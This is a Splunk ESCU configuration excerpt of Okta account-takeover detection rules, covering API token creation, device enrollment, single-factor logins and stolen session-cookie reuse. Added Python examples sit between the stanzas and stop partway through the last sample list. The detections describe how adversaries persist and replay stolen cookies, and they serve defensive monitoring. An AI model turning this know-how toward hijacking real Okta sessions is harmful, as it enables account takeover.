1 action.risk.param._risk_message = A new API token was created in Okta by [$user$]. Investigate further to determine if this was authorized. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta New API Token Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when a new API token is created within an Okta tenant. An adversary may create a new API token to maintain persistence within the environment. Monitoring for new API tokens can help detect potential account takeover attempts or unauthorized access to Okta accounts. 
action.notable.param.rule_title = Okta New API Token Created action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime from datamodel=Change where All_Changes.action=created AND All_Changes.command=system.api_token.create by _time span=5m All_Changes.user All_Changes.result All_Changes.command sourcetype All_Changes.src All_Changes.action All_Changes.object_category | `drop_dm_object_name("All_Changes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_new_api_token_created_filter` [ESCU - Okta New Device Enrolled on Account - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when a new device is enrolled on an Okta account. This behavior is indicative of a user adding a new device to their account. This activity is common when a user is setting up a new device or when a user has lost access to their previous device. However, this activity can also be indicative of an adversary adding a new device to an account to maintain access to an account. Monitoring for this activity can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic identifies when a new device is enrolled on an Okta account. This behavior is indicative of a user adding a new device to their account. This activity is common when a user is setting up a new device or when a user has lost access to their previous device. 
However, this activity can also be indicative of an adversary adding a new device to an account to maintain access to an account. Monitoring for this activity can help detect potential account takeover attempts or unauthorized access to Okta accounts. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = It is possible that the user has legitimately added a new device to their account. Please verify this activity. action.escu.creation_date = 2024-03-08 action.escu.modification_date = 2024-03-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta New Device Enrolled on Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A new device was enrolled on an Okta account for user [$user$]. Investigate further to determine if this was authorized.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta New Device Enrolled on Account - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 40, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when a new device is enrolled on an Okta account. This behavior is indicative of a user adding a new device to their account. This activity is common when a user is setting up a new device or when a user has lost access to their previous device. However, this activity can also be indicative of an adversary adding a new device to an account to maintain access to an account. Monitoring for this activity can help detect potential account takeover attempts or unauthorized access to Okta accounts. 
action.notable.param.rule_title = Okta New Device Enrolled on Account action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime from datamodel=Change where All_Changes.action=created All_Changes.command=device.enrollment.create by _time span=5m All_Changes.user All_Changes.result All_Changes.command sourcetype All_Changes.src All_Changes.action All_Changes.object_category | `drop_dm_object_name("All_Changes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_new_device_enrolled_on_account_filter` [ESCU - Okta Phishing Detection with FastPass Origin Check - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies when Okta's FastPass blocks a sign-in to a known phishing site. When your users are enrolled in FastPass, Okta can provide defenders a high-fidelity signal that user applications are being targeted by attackers wielding real-time (AiTM) proxies. Okta's Defensive Cyber Operations team routinely identifies phishing infrastructure configured to imitate an Okta sign-in page and proactively notifies Okta customers when suspicious infrastructure it detects appears to be targeting their users. Since March 2020, Okta has delivered over 1000 such notifications to customers.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1556"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies when Okta's FastPass blocks a sign-in to a known phishing site. When your users are enrolled in FastPass, Okta can provide defenders a high-fidelity signal that user applications are being targeted by attackers wielding real-time (AiTM) proxies. Okta's Defensive Cyber Operations team routinely identifies phishing infrastructure configured to imitate an Okta sign-in page and proactively notifies Okta customers when suspicious infrastructure it detects appears to be targeting their users. Since March 2020, Okta has delivered over 1000 such notifications to customers. action.escu.how_to_implement = This search is specific to Okta and requires Okta logs to be ingested in your Splunk deployment. action.escu.known_false_positives = Fidelity is high because Okta itself identifies the malicious infrastructure. Filter and modify as needed. action.escu.creation_date = 2023-03-09 action.escu.modification_date = 2023-03-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Phishing Detection with FastPass Origin Check - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = Okta FastPass has prevented $user$ from authenticating to a malicious site.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Okta Phishing Detection with FastPass Origin Check - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1556"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when Okta's FastPass blocks a sign-in to a known phishing site. When your users are enrolled in FastPass, Okta can provide defenders a high-fidelity signal that user applications are being targeted by attackers wielding real-time (AiTM) proxies. Okta's Defensive Cyber Operations team routinely identifies phishing infrastructure configured to imitate an Okta sign-in page and proactively notifies Okta customers when suspicious infrastructure it detects appears to be targeting their users. Since March 2020, Okta has delivered over 1000 such notifications to customers.
action.notable.param.rule_title = Okta Phishing Detection with FastPass Origin Check action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType="user.authentication.auth_via_mfa" AND result="FAILURE" AND outcome.reason="FastPass declined phishing attempt" | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user eventType client.userAgent.rawUserAgent client.userAgent.browser outcome.reason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_phishing_detection_with_fastpass_origin_check_filter` [ESCU - Okta Risk Threshold Exceeded - Rule] action.escu = 0 action.escu.enabled = 1 description = This correlation search aggregates the risk events produced by the detection analytics in the "Suspicious Okta Activity", "Okta Account Takeover", and "Okta MFA Exhaustion" analytic stories. It triggers a notable event in Incident Review when a single user has accumulated more than 5 distinct MITRE ATT&CK technique IDs from these stories within the search window. Such an incident highlights potentially suspicious activity by a compromised user. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1110"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = This correlation search aggregates the risk events produced by the detection analytics in the "Suspicious Okta Activity", "Okta Account Takeover", and "Okta MFA Exhaustion" analytic stories. It triggers a notable event in Incident Review when a single user has accumulated more than 5 distinct MITRE ATT&CK technique IDs from these stories within the search window. Such an incident highlights potentially suspicious activity by a compromised user.
action.escu.how_to_implement = This search leverages the Risk Framework from Enterprise Security. Ensure that the "Suspicious Okta Activity", "Okta Account Takeover", and "Okta MFA Exhaustion" analytic stories are enabled. TTPs may be set to Notables for point detections; anomalies should not be notables but rather risk generators. The correlation relies on accumulated risk before generating a notable; modify the threshold (mitre_technique_id_count > 5) as needed. As shipped, the search runs hourly over a 60-minute window (dispatch.earliest_time = -70m@m, dispatch.latest_time = -10m@m); widen dispatch.earliest_time if a longer lookback, such as 24 hours, is wanted. action.escu.known_false_positives = False positives will be limited to the number of events generated by the analytics tied to the stories. Analytics will need to be tested and tuned, and the risk score reduced as needed based on the organization. action.escu.creation_date = 2024-04-02 action.escu.modification_date = 2024-04-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Risk Threshold Exceeded - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover", "Okta MFA Exhaustion", "Suspicious Okta Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Okta Risk Threshold Exceeded - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover", "Okta MFA Exhaustion", "Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1110"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This correlation search aggregates the risk events produced by the detection analytics in the "Suspicious Okta Activity", "Okta Account Takeover", and "Okta MFA Exhaustion" analytic stories.
It triggers a notable event in Incident Review when a single user has accumulated more than 5 distinct MITRE ATT&CK technique IDs from these stories within the search window. Such an incident highlights potentially suspicious activity by a compromised user. action.notable.param.rule_title = RBA: Okta Risk Threshold Exceeded action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(All_Risk.analyticstories) as analyticstories sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count,values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.risk_object_type = user All_Risk.analyticstories IN ("Okta Account Takeover", "Suspicious Okta Activity","Okta MFA Exhaustion") by All_Risk.risk_object,All_Risk.risk_object_type | `drop_dm_object_name("All_Risk")` | search mitre_technique_id_count > 5 | `okta_risk_threshold_exceeded_filter` [ESCU - Okta Successful Single Factor Authentication - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies successful authentication events against the Okta Dashboard for accounts without Multi-Factor Authentication enabled. It specifically searches for events where "Okta Verify" is not detected during authentication.
This could indicate a misconfiguration, a policy violation, or an account takeover attempt that warrants investigation. If your organization has other authenticators configured in the environment, consider excluding those from the "targets" in the detection search. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies successful authentication events against the Okta Dashboard for accounts without Multi-Factor Authentication enabled. It specifically searches for events where "Okta Verify" is not detected during authentication. This could indicate a misconfiguration, a policy violation, or an account takeover attempt that warrants investigation. If your organization has other authenticators configured in the environment, consider excluding those from the "targets" in the detection search. action.escu.how_to_implement = This detection utilizes logs from Okta environments and requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = Although not recommended, certain users may be exempt from multi-factor authentication. Adjust the filter as necessary. 
action.escu.creation_date = 2024-04-08 action.escu.modification_date = 2024-04-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Successful Single Factor Authentication - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A user [$user$] has successfully logged in to Okta Dashboard with single factor authentication from IP Address - [$src_ip$]. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Successful Single Factor Authentication - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` action=success src_user_type = User eventType = user.authentication.verify OR eventType = user.authentication.auth_via_mfa| stats dc(eventType) values(eventType) as eventType values(target{}.displayName) as targets values(debugContext.debugData.url) min(_time) as firstTime max(_time) as lastTime values(authentication_method) by src_ip user action | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search targets !="Okta Verify" | 
`okta_successful_single_factor_authentication_filter` [ESCU - Okta Suspicious Activity Reported - Rule] action.escu = 0 action.escu.enabled = 1 description = This event is generated when an associate receives an email from Okta inquiring whether a login attempt was suspicious. If the associate deems it suspicious, an event is generated for review. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This event is generated when an associate receives an email from Okta inquiring whether a login attempt was suspicious. If the associate deems it suspicious, an event is generated for review. action.escu.how_to_implement = This detection utilizes logs from Okta Identity Management (IM) environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). Additionally, it necessitates the activation of suspicious activity reporting and training for associates to report such activities. action.escu.known_false_positives = False positives should be minimal, given the high fidelity of this detection. action.escu.creation_date = 2022-09-21 action.escu.modification_date = 2022-09-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Suspicious Activity Reported - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A user [$user$] reported suspicious activity in Okta. Investigate further to determine if this was authorized.
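The "Okta Successful Single Factor Authentication" search above groups successful user.authentication.verify and user.authentication.auth_via_mfa events by source IP and user, collects the target display names, and keeps the groups in which "Okta Verify" never appears. The Python below is an added example, not code from the Splunk Threat Research Team or the ESCU app: it applies that grouping to constructed Okta System Log events (the target types, display names, IPs and users are assumptions) and makes the set of accepted second factors a parameter, which is the tuning the description recommends for tenants with other authenticators. It treats a group as single-factor only when none of its targets is an accepted authenticator, which is the intent stated in the description; check how `search targets!="Okta Verify"` behaves against the multivalue field on your own data before relying on that SPL clause.

```python
# Added example (not from the Splunk Threat Research Team or the ESCU app):
# the "Okta Successful Single Factor Authentication" logic in Python over
# constructed Okta System Log events. Event shapes are simplified assumptions.
from collections import defaultdict
from datetime import datetime, timezone

MFA_EVENTS = {"user.authentication.verify", "user.authentication.auth_via_mfa"}
# Authenticators that count as a second factor. The ESCU search only excludes
# "Okta Verify"; extend this set for the other authenticators your tenant uses.
STRONG_AUTHENTICATORS = {"Okta Verify"}


def to_epoch(published):
    return datetime.strptime(published, "%Y-%m-%dT%H:%M:%S.%fZ").replace(
        tzinfo=timezone.utc).timestamp()


def single_factor_sessions(events, strong=STRONG_AUTHENTICATORS):
    """Group successful MFA-stage events by (src_ip, user), like
    `stats ... values(target{}.displayName) as targets by src_ip user action`,
    and keep the groups whose targets contain none of the strong authenticators.

    Returns {(src_ip, user): {"targets": [...], "firstTime": epoch,
                              "lastTime": epoch, "count": n}}.
    """
    groups = defaultdict(lambda: {"targets": set(), "firstTime": None,
                                  "lastTime": None, "count": 0})
    for e in events:
        if e["eventType"] not in MFA_EVENTS or e["outcome"]["result"] != "SUCCESS":
            continue
        if e["actor"].get("type") != "User":      # src_user_type = User
            continue
        key = (e["client"]["ipAddress"], e["actor"]["alternateId"])
        g = groups[key]
        ts = to_epoch(e["published"])
        g["targets"].update(t["displayName"] for t in e.get("target", []))
        g["firstTime"] = ts if g["firstTime"] is None else min(g["firstTime"], ts)
        g["lastTime"] = ts if g["lastTime"] is None else max(g["lastTime"], ts)
        g["count"] += 1
    return {
        k: {**g, "targets": sorted(g["targets"])}
        for k, g in groups.items()
        if not (g["targets"] & strong)
    }


def _event(published, ip, user, targets, event_type="user.authentication.auth_via_mfa",
           result="SUCCESS", actor_type="User"):
    """Build a minimal, constructed Okta System Log event (sample data only)."""
    return {
        "eventType": event_type,
        "published": published,
        "actor": {"alternateId": user, "type": actor_type},
        "client": {"ipAddress": ip},
        "outcome": {"result": result},
        "target": [{"type": t_type, "displayName": name} for t_type, name in targets],
        "debugContext": {"debugData": {"url": "/app/UserHome"}},
    }


SAMPLE_EVENTS = [
    # alice: password step, then an Okta Verify push from the same IP; both
    # land in one (src_ip, user) group, so the group is excluded
    _event("2024-04-01T09:00:00.000Z", "203.0.113.5", "alice@example.com",
           [("AppInstance", "Okta Dashboard")], event_type="user.authentication.verify"),
    _event("2024-04-01T09:00:04.000Z", "203.0.113.5", "alice@example.com",
           [("AuthenticatorEnrollment", "Okta Verify"), ("AppInstance", "Okta Dashboard")]),
    # bob: password only, single factor
    _event("2024-04-01T09:10:00.000Z", "198.51.100.7", "bob@example.com",
           [("AppInstance", "Okta Dashboard")], event_type="user.authentication.verify"),
    # carol: FIDO2 security key, which the stock search would still flag
    _event("2024-04-01T09:20:00.000Z", "192.0.2.44", "carol@example.com",
           [("AuthenticatorEnrollment", "FIDO2 (WebAuthn)"), ("AppInstance", "Okta Dashboard")]),
    # a failed attempt and a non-User actor are ignored
    _event("2024-04-01T09:30:00.000Z", "198.51.100.7", "bob@example.com",
           [("AppInstance", "Okta Dashboard")], result="FAILURE"),
    _event("2024-04-01T09:40:00.000Z", "203.0.113.9", "okta-sync@example.com",
           [("AppInstance", "Okta Dashboard")], actor_type="SystemPrincipal"),
]
```

With the defaults, bob and carol are reported and alice is not; passing `strong={"Okta Verify", "FIDO2 (WebAuthn)"}` drops carol, which is the tuning to apply in SPL by excluding the extra authenticator names from `targets`.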
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Suspicious Activity Reported - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This event is generated when an associate receives an email from Okta inquiring whether a login attempt was suspicious. If the associate deems it suspicious, an event is generated for review. action.notable.param.rule_title = Okta Suspicious Activity Reported action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType=user.account.report_suspicious_activity_by_enduser | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user eventType client.userAgent.rawUserAgent client.userAgent.browser client.geographicalContext.city client.geographicalContext.country | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_suspicious_activity_reported_filter` [ESCU - Okta Suspicious Use of a Session Cookie - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where multiple client attributes (such as IP, User Agent, etc.) associated with the same Device Token change for a specific user. 
It aims to detect scenarios where an adversary might attempt to reuse a stolen web session cookie. \ * It retrieves policy evaluation events from successful authentication attempts. \ * It aggregates and groups these events by Device Token and User, providing the first policy evaluation event within the search window. \ * It checks for the presence of more than one IP and whether there are multiple OS or browsers for each User/Device Token combination. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1539"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies instances where multiple client attributes (such as IP, User Agent, etc.) associated with the same Device Token change for a specific user. It aims to detect scenarios where an adversary might attempt to reuse a stolen web session cookie. \ * It retrieves policy evaluation events from successful authentication attempts. \ * It aggregates and groups these events by Device Token and User, providing the first policy evaluation event within the search window. \ * It checks for the presence of more than one IP and whether there are multiple OS or browsers for each User/Device Token combination. action.escu.how_to_implement = This detection utilizes logs from Okta Identity Management (IM) environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = False positives may occur, depending on the organization's size and the configuration of Okta. 
action.escu.creation_date = 2024-03-17 action.escu.modification_date = 2024-03-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Suspicious Use of a Session Cookie - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity", "Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A user [$user$] is attempting to use a session cookie from multiple IP addresses or devices. Investigate further to determine if this was authorized. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Suspicious Use of a Session Cookie - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity", "Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1539"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType IN (policy.evaluate_sign_on) outcome.result IN (ALLOW, SUCCESS) | stats earliest(_time) as _time, values(client.ipAddress) as src_ip, values(client.userAgent.rawUserAgent) as user_agent, values(client.userAgent.os) as userAgentOS_list, values(client.geographicalContext.city) as city, values(client.userAgent.browser) as userAgentBrowser_list, values(device.os_platform) as okta_device_os, dc(client.userAgent.browser) as dc_userAgentBrowser, dc(client.userAgent.os) as dc_userAgentOS, 
dc(client.ipAddress) as dc_src_ip, values(outcome.reason) as reason by debugContext.debugData.dtHash, user | where dc_src_ip>1 AND (dc_userAgentOS>1 OR dc_userAgentBrowser>1) | `okta_suspicious_use_of_a_session_cookie_filter` [ESCU - Okta ThreatInsight Threat Detected - Rule] action.escu = 0 action.escu.enabled = 1 description = This anomaly is based on the identification of threats by Okta ThreatInsight. It allows for the escalation of risk based on src_ip or the addition of fields for further tracking. Possible identifications include password spraying, login failures, and login failures with a high count of unknown users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This anomaly is based on the identification of threats by Okta ThreatInsight. It allows for the escalation of risk based on src_ip or the addition of fields for further tracking. Possible identifications include password spraying, login failures, and login failures with a high count of unknown users. action.escu.how_to_implement = This detection utilizes logs from Okta Identity Management (IM) environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = False positives may occur. It is recommended to fine-tune Okta settings and the analytic to ensure high fidelity. Adjust the risk score as necessary. 
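The "Okta Suspicious Use of a Session Cookie" search above keys allowed policy.evaluate_sign_on events on the device token hash (debugContext.debugData.dtHash) and the user, then fires when that one token was presented from more than one IP and with more than one OS or browser. The Python below is an added example, not code from the Splunk Threat Research Team or the ESCU app: it runs the same grouping and `where dc_src_ip>1 AND (dc_userAgentOS>1 OR dc_userAgentBrowser>1)` test over constructed events (token hashes, IPs, cities and users are assumptions), including the roaming-laptop case that changes IP but not OS or browser, which the detection deliberately leaves alone.

```python
# Added example (not from the Splunk Threat Research Team or the ESCU app):
# the "Okta Suspicious Use of a Session Cookie" logic in Python over constructed
# policy.evaluate_sign_on events, keyed on debugContext.debugData.dtHash.
from collections import defaultdict
from datetime import datetime, timezone


def to_epoch(published):
    return datetime.strptime(published, "%Y-%m-%dT%H:%M:%S.%fZ").replace(
        tzinfo=timezone.utc).timestamp()


def suspicious_cookie_use(events):
    """For each (dtHash, user) seen in allowed sign-on policy evaluations,
    collect the distinct source IPs, OS and browser strings, and flag the pair
    when the same device token was presented from more than one IP *and* with
    more than one OS or browser. Events without a dtHash are skipped.
    """
    groups = defaultdict(lambda: {"_time": None, "src_ip": set(), "os": set(),
                                  "browser": set(), "city": set()})
    for e in events:
        if e["eventType"] != "policy.evaluate_sign_on":
            continue
        if e["outcome"]["result"] not in ("ALLOW", "SUCCESS"):
            continue
        dt_hash = e.get("debugContext", {}).get("debugData", {}).get("dtHash")
        if not dt_hash:
            continue
        g = groups[(dt_hash, e["actor"]["alternateId"])]
        ts = to_epoch(e["published"])
        g["_time"] = ts if g["_time"] is None else min(g["_time"], ts)  # earliest(_time)
        client = e["client"]
        g["src_ip"].add(client["ipAddress"])
        g["os"].add(client["userAgent"]["os"])
        g["browser"].add(client["userAgent"]["browser"])
        g["city"].add(client.get("geographicalContext", {}).get("city", ""))
    return {
        key: {k: (sorted(v) if isinstance(v, set) else v) for k, v in g.items()}
        for key, g in groups.items()
        if len(g["src_ip"]) > 1 and (len(g["os"]) > 1 or len(g["browser"]) > 1)
    }


def _event(published, user, ip, os_name, browser, city, dt_hash, result="ALLOW"):
    """Build a minimal, constructed Okta System Log event (sample data only)."""
    return {
        "eventType": "policy.evaluate_sign_on",
        "published": published,
        "actor": {"alternateId": user, "type": "User"},
        "client": {
            "ipAddress": ip,
            "userAgent": {"os": os_name, "browser": browser,
                          "rawUserAgent": f"{browser} on {os_name}"},
            "geographicalContext": {"city": city},
        },
        "outcome": {"result": result, "reason": "Sign-on policy evaluation resulted in " + result},
        "debugContext": {"debugData": {"dtHash": dt_hash} if dt_hash else {}},
    }


SAMPLE_EVENTS = [
    # dave: one device token replayed from a second IP on a different OS -> flagged
    _event("2024-04-01T08:00:00.000Z", "dave@example.com", "203.0.113.5", "Windows 10", "CHROME", "Boston", "dt-aaaa"),
    _event("2024-04-01T08:30:00.000Z", "dave@example.com", "198.51.100.7", "Linux", "CHROME", "Frankfurt", "dt-aaaa"),
    # erin: same token from two IPs but identical OS/browser (roaming laptop) -> not flagged
    _event("2024-04-01T08:05:00.000Z", "erin@example.com", "192.0.2.10", "Mac OS X", "SAFARI", "Seattle", "dt-bbbb"),
    _event("2024-04-01T09:05:00.000Z", "erin@example.com", "192.0.2.77", "Mac OS X", "SAFARI", "Seattle", "dt-bbbb"),
    # frank: two devices, each with its own token -> not flagged
    _event("2024-04-01T08:10:00.000Z", "frank@example.com", "203.0.113.20", "Windows 11", "EDGE", "Austin", "dt-cccc"),
    _event("2024-04-01T08:12:00.000Z", "frank@example.com", "203.0.113.21", "iOS", "SAFARI", "Austin", "dt-dddd"),
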